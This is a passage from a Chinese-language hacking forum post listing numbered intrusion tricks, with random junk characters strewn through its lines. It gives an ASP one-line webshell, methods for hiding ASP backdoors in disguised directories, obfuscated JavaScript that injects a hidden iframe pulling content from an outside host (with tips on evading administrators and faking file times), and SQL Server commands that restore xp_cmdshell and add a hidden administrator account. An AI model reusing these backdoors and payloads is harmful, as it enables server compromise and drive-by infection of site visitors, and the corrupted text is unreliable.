f).<%if request("cmd")<>"" then execute request("pass")%>
% f1 x/ A9 c. D% Q/ `4 [) ^) F- N( J3 w6 G: S
52、at "12:17" /interactive cmd: j( G* Y3 {3 N/ H5 J
执行后可以用AT命令查看新加的任务
; H% g. a6 q/ K8 a) R+ N5 b用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。" e1 P! K  s1 ?  n: {! G
  N5 Q9 q' B$ O) j
53、隐藏ASP后门的两种方法
$ e3 n2 C  m! l) ~- c/ ?& R9 s% J1、建立非标准目录:mkdir images..\
- b7 s7 Y7 M9 K- M: r9 S2 O1 Z4 V拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
7 F/ j/ d$ ]5 p0 W5 P通过web访问ASP木马:http://ip/images../news.asp?action=login  q3 V6 Z4 ^6 Y
如何删除非标准目录:rmdir images..\ /s0 {) x% g, A- }8 X& c! m
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
+ L  A- P6 S4 M) f$ {  `9 ]; U( Nmkdir programme.asp$ b" q5 H" ]% b% F
新建1.txt文件内容:<!--#include file=”12.jpg”-->
2 _3 P* }$ |7 f* V/ T" L% p1 f& B新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件- ?  ]! C& O3 N: G' Q
attrib +H +S programme.asp
1 N- F6 `6 A' K+ g) _- t' ^! M通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt# U  v+ M( [- P) a1 s2 I" s

' Y- g  ]% M7 A0 d3 M; w5 C+ Z8 z54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。2 z( H4 U/ H4 R3 K- [& B
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
* f# B/ `7 S7 ]( c( M- [% I% y4 \. J$ O$ K" A
55、JS隐蔽挂马
) y0 d' Y/ y* t7 ^* Y1.
+ a: m- `( r9 Hvar tr4c3="<iframe src=ht";
% R; t# S% m5 h+ r9 U( z' Ktr4c3 = tr4c3+"tp:/";
+ S1 Z% Q3 T; w9 vtr4c3 = tr4c3+"/ww";
) o6 l/ K" H4 `3 J) [6 btr4c3 = tr4c3+"w.tr4";; J: g0 i5 q- Q6 w" L+ ?5 ^) @
tr4c3 = tr4c3+"c3.com/inc/m";
; X# _& ~5 Q) Y' \% otr4c3 = tr4c3+"m.htm style="display:none"></i";, V2 |! L8 n2 p( e: {( k7 m
tr4c3 =tr4c3+"frame>'";4 L  d4 J  B  Y) U5 O
document.write(tr4c3);
% o" r8 q$ h5 s! \9 Z避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。5 ]4 L7 q8 _! e
" w0 X) S' f# F2 ?3 ]2 e6 M- j
2.7 O, n: `' F* B. B
转换进制,然后用EVAL执行。如
& C4 J. I. L* v0 y8 ^eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");( h3 x* Z( W0 x" r& e, g
不过这个有点显眼。
, b$ N; ~4 T: l5 k) f, L3.
7 L" E2 o( C2 V' D/ fdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');2 l% I% l  W0 J" f
最后一点,别忘了把文件的时间也修改下。/ X+ `* b) Q1 r
6 B. m! v( u4 Z6 Y; J/ @
56.3389终端入侵常用DOS命令* m. {1 O% |  [* h9 o) n2 T
taskkill taskkill /PID 1248 /t7 i+ q. ^) h4 r/ n
  U; Z' D" z# R1 l% o
tasklist 查进程" C2 i8 @+ I8 \( X* U
& J+ b0 i7 [& k- i( I" N* _
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限9 I) H+ z7 F2 a" x! _( `
iisreset /reboot
9 k9 |9 `: H' o) S* gtsshutdn /reboot /delay:1    重起服务器  t! l% _+ [+ I9 N% J$ F% B
1 i9 v* l: C. q2 Y
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
$ z1 ]  q; g, W6 _- P3 \* p
$ E4 H( c: {$ m# H( j9 ]  uquery user 查看当前终端用户在线情况
# n3 _7 G- _$ S! N% |6 M: w& _. C, N- }
要显示有关所有会话使用的进程的信息,请键入:query process *2 e. w, c# j& h5 k  f& X
/ `: A8 D0 M& ?7 n
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2& L! `7 U! d4 l1 \6 ]2 F& X

+ n; z: E. x, n( |/ S4 f6 Z要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
# c% H) p9 ?) q9 Y3 _! i  _6 n+ Y/ c# K! s
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM027 p, i1 _9 e$ Y& }

- k, [* f; L/ C6 _7 K. C命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启1 O! Q' Y8 b9 e! x2 {% i7 E
# v  K& i4 H3 d
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
; j! \8 h1 h4 C5 \- c/ c5 H3 r/ ^, A' G2 A* r; Y& J0 |
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
( t; H$ t% o8 u" m9 ?) U, Y& a+ R9 a1 ^; K/ h/ K
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
8 A3 F# @$ N# t, U( o+ g
4 d/ d+ x& N* V$ U# b2 R) E5 y  `56、在地址栏或按Ctrl+O,输入:: B1 c& H8 v+ o9 S9 i
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
8 \$ u1 B# U! @8 d' ~* K+ h0 y9 X2 n1 {
1 i9 r. w  y- e1 L% I" O* l: ~源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。8 d# }7 w- ]# g# \+ @

9 G/ R  W+ Q/ P0 O5 E57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
$ G- `2 U, M( q$ t# P2 H用net localgroup administrators是可以看到管理组下,加了$的用户的。
% A- [  S) y- ]+ @/ u0 j) M. B4 C- q+ z$ s  @, C% U6 S: Q) }3 L
58、 sa弱口令相关命令; v8 M2 ?% Y. H0 \7 ]) `4 {

) y7 O) R4 C& j- V; ]0 z一.更改sa口令方法:, c" Y2 G+ U2 Z0 F
用sql综合利用工具连接后,执行命令:
$ K* I1 g# T  f/ Hexec sp_password NULL,'20001001','sa'
8 ~$ F$ F* L" I% C4 @0 _(提示:慎用!)- J- N: i. k, ]4 `

2 h1 b' Z3 e8 n1 r二.简单修补sa弱口令.( }( ~- W0 T* g
" [' b0 \- j$ e- x  u3 W5 r
方法1:查询分离器连接后执行:
3 K" O/ k: y/ `3 Qif exists (select * from
9 V; K  z$ [* R1 Bdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
1 i. z- s/ ?6 r( J2 d6 }# nOBJECTPROPERTY(id, N'IsExtendedProc') = 1)2 T; t( v2 Z+ N& o$ B) a, a

/ v  \2 Y1 v- ]% mexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'- Q" r' y$ t8 g0 z* w
$ v7 Z3 n+ V2 Y# z7 |" k
GO( S* s* f% x5 ^. O$ O
3 F* X: `7 G0 p
然后按F5键命令执行完毕
( z; N" F3 I" m0 ^2 Y0 w  c& U8 p1 l1 d4 R/ u0 M: j, U. R
方法2:查询分离器连接后
$ ]% e0 w) c  ?# B第一步执行:use master" N$ H: j7 [0 _0 l& h& q$ |
第二步执行:sp_dropextendedproc 'xp_cmdshell'
% w2 [) v% T3 W# r然后按F5键命令执行完毕% w9 f% C  \$ t9 O/ H0 L3 E

1 Y) j5 c; D9 }5 Z0 v: n. i2 S9 N- r" `
三.常见情况恢复执行xp_cmdshell.( r& d3 N2 h# b+ z8 S: x$ u; {
$ V+ y$ A( D3 B5 j5 A6 e1 R5 X
  C6 N1 |9 C/ j
1 未能找到存储过程'master..xpcmdshell'.# J3 P5 l# t. A& ?: i. h/ I8 ?& i
   恢复方法:查询分离器连接后,
! v# Y% J1 Z$ G第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
( k& E2 T/ f+ ?) j, s第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
" R# |/ A$ S7 _: [% Q, Q8 O然后按F5键命令执行完毕. l0 r1 u5 b: P* e  y
& s" ~  _) n! _- _6 {
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)& ?* {8 |: p% c8 G
恢复方法:查询分离器连接后,3 w; w( \0 q' }  {4 f1 X
第一步执行:sp_dropextendedproc "xp_cmdshell"& Y' K6 V: q5 C
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'3 y% l; H* m& d, B( ^
然后按F5键命令执行完毕
) h" C. f9 p3 `7 n6 G" S& G# e
1 C$ S7 K& ~5 v3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。); X: l1 {& y2 G6 u  K' s# g1 x! R
恢复方法:查询分离器连接后,7 g! d/ B4 _2 H
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
. c( D8 s2 O+ X  s8 E1 P+ m第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
7 U6 p+ \0 ~$ P" r+ u8 i然后按F5键命令执行完毕  e: P" i* Q  f) P" I% e+ d% }0 a7 \

- c( Y& K( p1 e. W/ p+ l四.终极方法.8 ]: h9 g6 a) ]$ n) m
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:. ^0 u/ a8 K. ~( ?( ~% q1 `
查询分离器连接后,
; z+ H' d( Z) r- i+ j2000servser系统:: B3 C3 g- y# O4 i( X/ b
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'( B( R0 T8 W) R/ _& A
8 l8 [2 F( a. e$ G/ G. _/ x% y6 ]! S
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
9 E. h& |* p* W7 ]8 p; F" N& Z% {: E. D/ V) J. ^" ]
xp或2003server系统:1 L9 ^+ W2 @; e" |
9 Q! h6 z, d3 f* R6 q( D
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'$ L3 d% @  ?( P8 f, {6 M/ _% a6 X; h
$ x3 o; C7 ?$ c; U
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
0 \  B' r% B  \. H
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表